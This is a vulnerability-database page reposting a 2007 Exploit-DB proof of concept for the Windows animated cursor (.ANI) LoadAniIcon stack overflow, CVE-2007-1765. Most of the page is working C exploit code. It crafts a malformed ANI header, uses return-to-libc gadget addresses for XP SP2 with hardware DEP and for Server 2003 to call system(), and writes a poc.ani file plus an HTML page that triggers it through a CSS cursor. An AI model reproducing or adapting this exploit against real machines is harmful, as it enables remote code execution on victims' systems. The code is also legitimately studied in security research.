Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)

🗓️ 03 Apr 2007 00:00:00Reported by devcodeType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 43 Views

Microsoft Windows .ANI LoadAniIcon Stack Overflow, Remote code execution exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS Windows Animated Cursor (.ANI) Stack Overflow Exploit
31 Mar 200700:00
zdt
0day.today		MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)
3 Apr 200700:00
zdt
Circl		CVE-2007-1765
20 Sep 201000:00
circl
Check Point Advisories		Microsoft Windows ANI file Denial of Service - Ver2 (CVE-2007-1765)
31 Mar 201400:00
checkpoint_advisories
CVE		CVE-2007-1765
30 Mar 200700:00
cve
Cvelist		CVE-2007-1765
30 Mar 200700:00
cvelist
Exploit DB		Microsoft Windows - Animated Cursor '.ani' Local Stack Overflow
31 Mar 200700:00
exploitdb
exploitpack		Microsoft Windows - Animated Cursor .ani Local Overflow (Hardware DEP)
3 Apr 200700:00
exploitpack
exploitpack		Microsoft Windows - Animated Cursor .ani Local Stack Overflow
31 Mar 200700:00
exploitpack
Metasploit		Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
25 Jul 201016:02
metasploit
Rows per page
/*
* version 0.5
* Copyright (c) 2007 devcode
*
*
*			^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
* [CVE-2007-1765]
*
*
* Description:
*    A vulnerability has been identified in Microsoft Windows,
*    which could be exploited by remote attackers to take complete
*    control of an affected system. This issue is due to a stack overflow
*    error within the "LoadAniIcon()" [user32.dll] function when rendering
*    cursors, animated cursors or icons with a malformed header, which could
*    be exploited by remote attackers to execute arbitrary commands by
*    tricking a user into visiting a malicious web page or viewing an email
*    message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*    None as of this time.
*
* Vulnerable systems:
*	  Microsoft Windows 2000 Service Pack 4
*	  Microsoft Windows XP Service Pack 2
*	  Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
*	  Microsoft Windows XP Professional x64 Edition
*	  Microsoft Windows Server 2003
*	  Microsoft Windows Server 2003 (Itanium)
*	  Microsoft Windows Server 2003 Service Pack 1
*	  Microsoft Windows Server 2003 Service Pack 1 (Itanium)
*	  Microsoft Windows Server 2003 x64 Edition
*	  Microsoft Windows Vista
*
*	  Microsoft Internet Explorer 6
*	  Microsoft Internet Explorer 7
*
* Tested on:
* 	 Microsoft XP SP2 + DEP + Internet Explorer 6
*
*    This is a PoC and was created for educational purposes only. The
*    author is not held responsible if this PoC does not work or is
*    used for any other purposes than the one stated above.
*
*	Credit goes to HOD (if he/they exist :P) for the html. Works on
*    XP SP2 with Hardware DEP enabled, go figure.
*
*    ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)
*
*
*/
#include <iostream>
#include <windows.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* system("calc.exe"); */
char szExecute[] = "logoff.exe\x00";

unsigned char uszHtml[] =
"<html>"
"Microsoft Windows .ANI LoadAniIcon Exploit"
"<br>Copyright (c) 2007 devcode<br>"
"<style>" \
"* {CURSOR: url(\"poc.ani\")}</style></head>"
"</html>";

/* Usage: ani.exe 1*/
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\t(0) Kernel32.dll (ExitProcess)\n"
"\t(1) Windows XP SP2 + DEP\n"
"\t(2) Windows 2003 Server\n"
"Usage: ani.exe <target>";

/* RET2LIBC attack */
typedef struct {
	const char *szTarget;
	/* kernel32.dll - set the proper stack frame
		LEA EBP, DWORD PTR SS:[ESP+10]
		SUB ESP, EAX
		PUSH EBX
		PUSH ESI
		PUSH EDI
		....
		....
		RETN
	*/
	unsigned char uszRet[5];
	/* msvcrt.dll - system() */
	unsigned char uszMsvcrtCall[5];
} TARGET;

TARGET targets[] = {
	{ "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" },
	{ "Windows XP SP2", "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" },
	{ "Windows 2003 Server", "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" }
};

int main( int argc, char **argv ) {
	char szBuffer[1024];
	FILE *f;
	void *pExitProcess[4];

	if ( argc < 2 ) {
		printf("%s\n", szIntro );
		return 0;
	}

	if ( atoi( argv[1] ) == 0 ) {
		printf("[+] Getting ExitProcess address...\n");
		*pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), 
"ExitProcess" );
		if ( pExitProcess == NULL ) {
			printf("[-] Cannot get ExitProcess address\n");
			return 0;
		}
		memcpy( targets[1].uszRet, pExitProcess, 4 );
	}

	printf("[+] Creating ANI header...\n");
	memset( szBuffer, 0x90, sizeof( szBuffer ) );
	memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

	printf("[+] Copying execution code...\n");
	memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
	memset( szBuffer + 136, 0, 4 );
	memset( szBuffer + 204, 0, 4 );
	szBuffer[136] = 0x6C;
	szBuffer[204] = 0x6C;
	memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
	memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
	memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );

	f = fopen( "poc.ani", "wb" );
	if ( f == NULL ) {
		printf("[-] Cannot create ani file\n");
		return 0;
	}

	fwrite( szBuffer, 1, 1024, f );
	fclose( f );
	printf("[+] .ANI file succesfully created!\n");

	f = fopen( "poc.html", "wb" );
	if ( f == NULL ) {
		printf("[-] Cannot create html file\n");
		return 0;
	}

	fwrite( uszHtml, 1, sizeof( uszHtml ), f );
	fclose( f );
	printf("[+] HTML file succesfully created!\n");

	return 0;
}

// milw0rm.com [2007-04-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2007 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.60778
microsoft windowsani loadaniiconstack overflowhardware depremote code executionvulnerabilitydevcode
43